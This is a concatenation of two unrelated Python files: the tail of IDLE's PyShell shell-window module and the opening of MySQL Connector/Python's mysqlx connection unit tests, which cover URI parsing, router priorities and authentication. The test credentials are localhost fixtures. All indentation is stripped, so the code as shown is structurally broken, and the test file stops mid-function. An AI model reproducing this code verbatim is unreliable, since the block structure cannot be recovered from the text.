text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
import IOBinding
self.stdout = PseudoFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoStderrFile(self, encoding=IOBinding.encoding)
self.console = PseudoFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
# Cleanup functions to be called when endexecuting is called
self._cleanup_funcs = []
def append_cleanup_func(self, func, *args, **kwargs):
self._cleanup_funcs.append((func, args, kwargs))
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
master=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
for func, args, kwargs in self._cleanup_funcs:
func(*args, **kwargs)
self._cleanup_funcs = []
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"The program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
if self.reading:
self.top.quit()
self.canceled = True
self.closing = True
# Wait for poll_subprocess() rescheduling to stop
self.text.after(2 * self.pollinterval, self.close2)
def close2(self):
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.showprompt()
import Tkinter
Tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
if isinstance(line, unicode):
import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
master=self.text)
return
from StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
text = self.text
text.see("iomark")
ranges = text.tag_ranges("restart")
if not ranges:
return
restart_line = self.interp.get_restart_line()
for indx in range(len(ranges), 0, -2):
lineno = '%s.0' % str(ranges[indx - 1]).split('.')[0]
start, end = ('%s +1 line' % lineno, '%s +2 lines +1c' % lineno)
content = text.get(start, end)[4:].rstrip()
if content and content[:-2] != restart_line:
break
text.see(lineno)
def restart_shell(self, event=None):
self.stderr.signaled = False
self.interp.restart_subprocess()
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.history_store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
class PseudoFile(object):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self.encoding = encoding
def write(self, s):
self.shell.write(s, self.tags)
def writelines(self, l):
map(self.write, l)
def flush(self):
pass
def isatty(self):
return True
class PseudoStderrFile(PseudoFile):
def __init__(self, shell, tags="stderr", encoding=None):
PseudoFile.__init__(self, shell, tags, encoding)
self.signaled = False
def write(self, s):
if not self.signaled:
signal_err = idleConf.GetOption('main', 'General',
'signal-first-error', default=1, type='bool')
if signal_err:
self.shell.top.wakeup(anystate=True)
self.signaled = True
PseudoFile.write(self, s)
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error, msg:
sys.stderr.write("Error: %s\n" % str(msg))
sys.stderr.write(usage_msg)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print "No script file: ", script
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not edit_start
# start editor and/or shell windows:
root = Tk(className="Idle")
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args:
flist.open(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.runningAsOSXApp() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
shell = flist.pyshell
# handle remaining options:
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if shell and cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
root.mainloop()
root.destroy()
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
|
test_mysqlx_connection.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016, 2020, Oracle and/or its affiliates.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0, as
# published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms,
# as designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an
# additional permission to link the program and your derivative works
# with the separately licensed software that they have included with
# MySQL.
#
# Without limiting anything contained in the foregoing, this file,
# which is part of MySQL Connector/Python, is also subject to the
# Universal FOSS Exception, version 1.0, a copy of which can be found at
# http://oss.oracle.com/licenses/universal-foss-exception.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Unittests for mysqlx.connection
"""
import logging
import os
import platform
import unittest
import sys
import tests
import time
import string
import socket
import struct
import random
import mysqlx
from threading import Thread
from time import sleep
from . import check_tls_versions_support
from mysqlx.connection import SocketStream, TLS_V1_3_SUPPORTED, HAVE_DNSPYTHON
from mysqlx.compat import STRING_TYPES
from mysqlx.errors import InterfaceError, OperationalError, ProgrammingError
from mysqlx.protocol import (Message, MessageReader, MessageWriter, Protocol,
HAVE_LZ4, HAVE_ZSTD)
from mysqlx.protobuf import (HAVE_MYSQLXPB_CEXT, HAVE_PROTOBUF, mysqlxpb_enum,
Protobuf)
from mysql.connector.utils import linux_distribution
from mysql.connector.version import VERSION, LICENSE
if mysqlx.compat.PY3:
from urllib.parse import quote_plus, quote
else:
from urllib import quote_plus, quote
from .test_mysqlx_crud import drop_table
LOGGER = logging.getLogger(tests.LOGGER_NAME)
_URI_TEST_RESULTS = ( # (uri, result)
("127.0.0.1", None),
("localhost", None),
("domain.com", None),
("user:password@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"password": "password", "port": 33060,
"user": "user"}),
("user:password@127.0.0.1:33061", {"schema": "", "host": "127.0.0.1",
"password": "password", "port": 33061,
"user": "user"}),
("user:@127.0.0.1", {"schema": "", "host": "127.0.0.1", "password": "",
"port": 33060, "user": "user"}),
("user:@127.0.0.1/schema", {"schema": "schema", "host": "127.0.0.1",
"password": "", "port": 33060,
"user": "user"}),
("user:@127.0.0.1/schema?use_pure=true", {"schema": "schema",
"host": "127.0.0.1",
"password": "", "port": 33060,
"user": "user",
"use-pure": True}),
("user:@127.0.0.1/schema?compression=required", {"schema": "schema",
"host": "127.0.0.1",
"port": 33060,
"password": "",
"user": "user",
"compression": "required"}),
("user{0}:password{0}@127.0.0.1/schema?use_pure=true"
"".format(quote("?!@#$%/:")), {"schema": "schema", "host": "127.0.0.1",
"port": 33060, "user": "user?!@#$%/:",
"password": "password?!@#$%/:",
"use-pure": True}),
("mysqlx://user:@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"password": "", "port": 33060,
"user": "user"}),
("mysqlx://user:@127.0.0.1:33060/schema",
{"schema": "schema", "host": "127.0.0.1", "password": "", "port": 33060,
"user": "user"}),
("mysqlx://user@[2001:db8:85a3:8d3:1319:8a2e:370:7348]:1", None),
("mysqlx://user:password@[2001:db8:85a3:8d3:1319:8a2e:370:7348]:1",
{"schema": "", "host": "2001:db8:85a3:8d3:1319:8a2e:370:7348",
"password": "password", "port": 1, "user": "user"}),
("mysqlx://user:password@[2001:db8:85a3:8d3:1319:8a2e:370:7348]:1/schema",
{"schema": "schema", "host": "2001:db8:85a3:8d3:1319:8a2e:370:7348",
"password": "password", "port": 1, "user": "user"}),
("áé'í'óú:unicode@127.0.0.1",
{"schema": "", "host": "127.0.0.1", "password": "unicode",
"port": 33060, "user": "áé'í'óú"}),
("unicode:áé'í'óú@127.0.0.1",
{"schema": "", "host": "127.0.0.1", "password": "áé'í'óú",
"port": 33060, "user": "unicode"}),
("root:@[localhost, 127.0.0.1:88, [::]:99, [a1:b1::]]",
{"routers": [{"host": "localhost", "port": 33060},
{"host": "127.0.0.1", "port": 88},
{"host": "::", "port": 99},
{"host": "a1:b1::", "port": 33060}],
"user": "root", "password": "", "schema": ""}),
("root:@[a1:a2:a3:a4:a5:a6:a7:a8]]",
{"host": "a1:a2:a3:a4:a5:a6:a7:a8", "schema": "",
"port": 33060, "user": "root", "password": ""}),
("root:@localhost", {"user": "root", "password": "",
"host": "localhost", "port": 33060, "schema": ""}),
("root:@[a1:b1::]", {"user": "root", "password": "",
"host": "a1:b1::", "port": 33060, "schema": ""}),
("root:@[a1:b1::]:88", {"user": "root", "password": "",
"host": "a1:b1::", "port": 88, "schema": ""}),
("root:@[[a1:b1::]:88]", {"user": "root", "password": "",
"routers": [{"host": "a1:b1::", "port":88}], "schema": ""}),
("root:@[(address=localhost:99, priority=99)]",
{"user": "root", "password": "", "schema": "",
"routers": [{"host": "localhost", "port": 99, "priority": 99}]})
)
_ROUTER_LIST_RESULTS = ( # (uri, result)
("áé'í'óú:unicode@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"port": 33060, "password": "unicode", "user": "áé'í'óú"}),
("unicode:áé'í'óú@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"port": 33060, "password": "áé'í'óú", "user": "unicode"}),
("user:password@[127.0.0.1, localhost]", {"schema": "", "routers":
[{"host": "127.0.0.1", "port": 33060}, {"host": "localhost", "port":
33060}], "password": "password", "user": "user"}),
("user:password@[(address=127.0.0.1, priority=99), (address=localhost,"
"priority=98)]", {"schema": "", "routers": [{"host": "127.0.0.1",
"port": 33060, "priority": 99}, {"host": "localhost", "port": 33060,
"priority": 98}], "password": "password", "user": "user"}),
)
_PREP_STMT_QUERY = (
"SELECT p.sql_text, p.count_execute "
"FROM performance_schema.prepared_statements_instances AS p "
"JOIN performance_schema.threads AS t ON p.owner_thread_id = t.thread_id "
"AND t.processlist_id = @@pseudo_thread_id")
def file_uri(path, brackets=True):
if brackets:
return "{0}{1}".format(path[0], quote_plus(path[1:]))
return "({0})".format(path)
def build_uri(**kwargs):
uri = "mysqlx://{0}:{1}".format(kwargs["user"], kwargs["password"])
if "host" in kwargs:
host = "[{0}]".format(kwargs["host"]) \
if ":" in kwargs["host"] else kwargs["host"]
uri = "{0}@{1}".format(uri, host)
elif "routers" in kwargs:
routers = []
for router in kwargs["routers"]:
fmt = "(address={host}{port}, priority={priority})" \
if "priority" in router else "{host}{port}"
host = "[{0}]".format(router["host"]) if ":" in router["host"] \
else router["host"]
port = ":{0}".format(router["port"]) if "port" in router else ""
routers.append(fmt.format(host=host, port=port,
priority=router.get("priority", None)))
uri = "{0}@[{1}]".format(uri, ",".join(routers))
else:
raise ProgrammingError("host or routers required.")
if "port" in kwargs:
uri = "{0}:{1}".format(uri, kwargs["port"])
if "schema" in kwargs:
uri = "{0}/{1}".format(uri, kwargs["schema"])
query = []
if "ssl_mode" in kwargs:
query.append("ssl-mode={0}".format(kwargs["ssl_mode"]))
if "ssl_ca" in kwargs:
query.append("ssl-ca={0}".format(kwargs["ssl_ca"]))
if "ssl_cert" in kwargs:
query.append("ssl-cert={0}".format(kwargs["ssl_cert"]))
if "ssl_key" in kwargs:
query.append("ssl-key={0}".format(kwargs["ssl_key"]))
if "use_pure" in kwargs:
query.append("use-pure={0}".format(kwargs["use_pure"]))
if "connect_timeout" in kwargs:
query.append("connect-timeout={0}".format(kwargs["connect_timeout"]))
if "connection_attributes" in kwargs:
conn_attrs = kwargs["connection_attributes"]
if isinstance(conn_attrs, STRING_TYPES) and \
not (conn_attrs.startswith("[") and conn_attrs.endswith("]")):
query.append("connection-attributes={}"
"".format(kwargs["connection_attributes"]))
else:
attr_list = []
for key in conn_attrs:
attr_list.append("{}={}".format(key, conn_attrs[key]))
query.append("connection-attributes={0}"
"".format("[{}]".format(",".join(attr_list))))
if "tls-versions" in kwargs:
tls_versions = kwargs["tls-versions"]
if isinstance(tls_versions, STRING_TYPES) and \
not (tls_versions.startswith("[") and tls_versions.endswith("]")):
query.append("tls-versions=[{}]"
"".format(kwargs["tls-versions"]))
else:
query.append("tls-versions=[{}]".format(",".join(tls_versions)))
if "tls-ciphersuites" in kwargs:
tls_ciphers = kwargs["tls-ciphersuites"]
if isinstance(tls_ciphers, STRING_TYPES) and \
not (tls_ciphers.startswith("[") and tls_ciphers.endswith("]")):
query.append("tls-ciphersuites=[{}]"
"".format(",".format(tls_ciphers)))
else:
query.append("tls-ciphersuites=[{}]".format(",".join(tls_ciphers)))
if len(query) > 0:
uri = "{0}?{1}".format(uri, "&".join(query))
return uri
class ServerSocketStream(SocketStream):
def __init__(self):
self._socket = None
def start_receive(self, host, port):
"""Opens a socket to comunicate to the given host, port
Args:
host (str): host name.
port (int): host port.
Returns:
address of the communication channel
"""
my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.bind((host, port))
# Starting receiving...
if sys.version_info > (3, 5):
my_sock.listen()
else:
my_sock.listen(1)
self._socket, addr = my_sock.accept()
return addr
class ServerProtocol(Protocol):
def __init__(self, reader, writer):
super(ServerProtocol, self).__init__(reader, writer)
def send_auth_continue_server(self, auth_data):
"""Send Server authenticate continue.
Args:
auth_data (str): Authentication data.
"""
msg = Message("Mysqlx.Session.AuthenticateContinue",
auth_data=auth_data)
self._writer.write_message(mysqlxpb_enum(
"Mysqlx.ServerMessages.Type.SESS_AUTHENTICATE_CONTINUE"), msg)
def send_auth_ok(self):
"""Send authenticate OK.
"""
msg = Message("Mysqlx.Session.AuthenticateOk")
self._writer.write_message(mysqlxpb_enum(
"Mysqlx.ServerMessages.Type.SESS_AUTHENTICATE_OK"), msg)
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 14), "XPlugin not compatible")
class MySQLxSessionTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.schema_name = self.connect_kwargs["schema"]
try:
self.session = mysqlx.get_session(self.connect_kwargs)
except mysqlx.Error as err:
self.fail("{0}".format(err))
if os.name == "nt":
if "64" in platform.architecture()[0]:
self.platform_arch = "x86_64"
elif "32" in platform.architecture()[0]:
self.platform_arch = "i386"
else:
self.platform_arch = platform.architecture()
self.os_ver = "Windows-{}".format(platform.win32_ver()[1])
else:
self.platform_arch = platform.machine()
if platform.system() == "Darwin":
self.os_ver = "{}-{}".format("macOS", platform.mac_ver()[0])
else:
self.os_ver = "-".join(linux_distribution()[0:2])
license_chunks = LICENSE.split(" ")
if license_chunks[0] == "GPLv2":
self.client_license = "GPL-2.0"
else:
self.client_license = "Commercial"
def test___init__(self):
bad_config = {
"host": "bad_host",
"port": "",
"username": "root",
"password": ""
}
self.assertRaises(InterfaceError, mysqlx.Session, bad_config)
host = self.connect_kwargs["host"]
port = self.connect_kwargs["port"]
user = self.connect_kwargs["user"]
password = self.connect_kwargs["password"]
# Session to a farm using one of many routers (prios)
# Loop during connect because of network error (succeed)
routers = [{"host": "bad_host","priority": 100},
{"host": host, "port": port, "priority": 98}]
uri = build_uri(user=user, password=password, routers=routers)
session = mysqlx.get_session(uri)
session.close()
# Session to a farm using one of many routers (incomplete prios)
routers = [{"host": "bad_host", "priority": 100},
{"host": host, "port": port}]
uri = build_uri(user=user, password=password, routers=routers)
self.assertRaises(ProgrammingError, mysqlx.get_session, uri)
try:
session = mysqlx.get_session(uri)
except ProgrammingError as err:
self.assertEqual(4000, err.errno)
# Session to a farm using invalid priorities (out of range)
routers = [{"host": "bad_host", "priority": 100},
{"host": host, "port": port, "priority": 101}]
uri = build_uri(user=user, password=password, routers=routers)
self.assertRaises(ProgrammingError, mysqlx.get_session, uri)
try:
session = mysqlx.get_session(uri)
except ProgrammingError as err:
self.assertEqual(4007, err.errno)
routers = [{"host": "bad_host", "priority": 100},
{"host": host, "port": port, "priority": "A"}]
uri = build_uri(user=user, password=password, routers=routers)
self.assertRaises(ProgrammingError, mysqlx.get_session, uri)
try:
session = mysqlx.get_session(uri)
except ProgrammingError as err:
self.assertEqual(4002, err.errno)
routers = [{"host": "bad_host", "priority": 100},
{"host": host, "port": port, "priority": -101}]
settings = {"user": user, "password": password, "routers": routers}
self.assertRaises(ProgrammingError, mysqlx.get_session, **settings)
try:
session = mysqlx.get_session(**settings)
except ProgrammingError as err:
self.assertEqual(4007, err.errno)
routers = [{"host": "bad_host", "priority": 100},
{"host": host, "port": port, "priority": "A"}]
settings = {"user": user, "password": password, "routers": routers}
self.assertRaises(ProgrammingError, mysqlx.get_session, **settings)
try:
session = mysqlx.get_session(**settings)
except ProgrammingError as err:
self.assertEqual(4007, err.errno)
# Establish an Session to a farm using one of many routers (no prios)
routers = [{"host": "bad_host"}, {"host": host, "port": port}]
uri = build_uri(user=user, password=password, routers=routers)
session = mysqlx.get_session(uri)
session.close()
# Break loop during connect (non-network error)
uri = build_uri(user=user, password="bad_pass", routers=routers)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Break loop during connect (none left)
uri = "mysqlx://{0}:{1}@[bad_host, another_bad_host]".format(user, password)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
try:
session = mysqlx.get_session(uri)
except InterfaceError as err:
self.assertEqual(4001, err.errno)
# Invalid option with URI
uri = "mysqlx://{0}:{1}@{2}:{3}?invalid=option" \
"".format(user, password, host, port)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
uri = "mysqlx://{0}:{1}@{2}:{3}?user=root" \
"".format(user, password, host, port)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
uri = "mysqlx://{0}:{1}@{2}:{3}?password=secret" \
"".format(user, password, host, port)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Invalid scheme
uri = "mysqlx+invalid://{0}:{1}@{2}:{3}" \
"".format(user, password, host, port)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Invalid option with dict
config = {
"user": user,
"password": password,
"host": host,
"port": port,
"invalid": "option"
}
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Invalid option with kwargs
self.assertRaises(InterfaceError, mysqlx.get_session, **config)
# SocketSteam.is_socket()
session = mysqlx.get_session(user=user, password=password,
host=host, port=port)
self.assertFalse(session._connection.stream.is_socket())
def test_auth(self):
sess = mysqlx.get_session(self.connect_kwargs)
sess.sql("CREATE USER 'native'@'%' IDENTIFIED WITH "
"mysql_native_password BY 'test'").execute()
sess.sql("CREATE USER 'sha256'@'%' IDENTIFIED WITH "
"sha256_password BY 'sha256'").execute()
config = {'host': self.connect_kwargs['host'],
'port': self.connect_kwargs['port']}
config['user'] = 'native'
config['password'] = 'test'
config['auth'] = 'plain'
mysqlx.get_session(config)
config['auth'] = 'mysql41'
mysqlx.get_session(config)
config['user'] = 'sha256'
config['password'] = 'sha256'
if tests.MYSQL_VERSION >= (8, 0, 1):
config['auth'] = 'plain'
mysqlx.get_session(config)
config['auth'] = 'mysql41'
self.assertRaises(InterfaceError, mysqlx.get_session, config)
sess.sql("DROP USER 'native'@'%'").execute()
sess.sql("DROP USER 'sha256'@'%'").execute()
sess.close()
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 5),
"SHA256_MEMORY authentation mechanism not available")
def test_auth_sha265_memory(self):
sess = mysqlx.get_session(self.connect_kwargs)
sess.sql("CREATE USER 'caching'@'%' IDENTIFIED WITH "
"caching_sha2_password BY 'caching'").execute()
config = {
"user": "caching",
"password": "caching",
"host": self.connect_kwargs["host"],
"port": self.connect_kwargs["port"]
}
